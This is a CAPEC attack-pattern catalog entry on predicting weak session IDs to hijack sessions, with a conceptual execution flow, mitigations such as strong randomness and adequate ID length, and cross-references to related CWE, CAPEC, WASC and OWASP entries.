CAPEC Details
Name Session Credential Falsification through Prediction
Likelyhood of attack Typical severity
High High
Summary This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
Prerequisites The target host uses session IDs to keep track of the users. Session IDs are used to control access to resources. The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time).
Execution Flow
Step Phase Description Techniques
1 Explore [Find Session IDs] The attacker interacts with the target host and finds that session IDs are used to authenticate users.
  • An attacker makes many anonymous connections and records the session IDs assigned.
  • An attacker makes authorized connections and records the session tokens or credentials issued.
2 Explore [Characterize IDs] The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable.
  • Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections.
  • Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs
  • Comparison against time. The attacker plots or compares the issued IDs to the time they were issued to check for correlation.
3 Experiment [Match issued IDs] The attacker brute forces different values of session ID and manages to predict a valid session ID.
  • The attacker models the session ID algorithm enough to produce a compatible session IDs, or just one match.
4 Exploit [Use matched Session ID] The attacker uses the falsified session ID to access the target system.
  • The attacker loads the session ID into their web browser and browses to restricted data or functionality.
  • The attacker loads the session ID into their network communications and impersonates a legitimate user to gain access to data or functionality.
Solutions Use a strong source of randomness to generate a session ID. Use adequate length session IDs Do not use information available to the user in order to generate session ID (e.g., time). Ideas for creating random numbers are offered by Eastlake [RFC1750] Encrypt the session ID if you expose it to the user. For instance session ID can be stored in a cookie in encrypted format.
Related Weaknesses
CWE ID Description
CWE-6 J2EE Misconfiguration: Insufficient Session-ID Length
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CWE-285 Improper Authorization
CWE-290 Authentication Bypass by Spoofing
CWE-330 Use of Insufficiently Random Values
CWE-331 Insufficient Entropy
CWE-346 Origin Validation Error
CWE-384 Session Fixation
CWE-488 Exposure of Data Element to Wrong Session
CWE-539 Use of Persistent Cookies Containing Sensitive Information
CWE-693 Protection Mechanism Failure
CWE-719 OWASP Top Ten 2007 Category A8 - Insecure Cryptographic Storage
Related CAPECS
CAPEC ID Description
CAPEC-196 An attacker creates a false but functional session credential in order to gain or usurp access to a service. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. If an attacker is able to forge valid session credentials they may be able to bypass authentication or piggy-back off some other authenticated user's session. This attack differs from Reuse of Session IDs and Session Sidejacking attacks in that in the latter attacks an attacker uses a previous or existing credential without modification while, in a forging attack, the attacker must create their own credential, although it may be based on previously observed credentials.
Taxonomy: WASC
Entry ID Entry Name
18 Credential/Session Prediction
Taxonomy: OWASP Attacks
Entry ID Entry Name
Link Session Prediction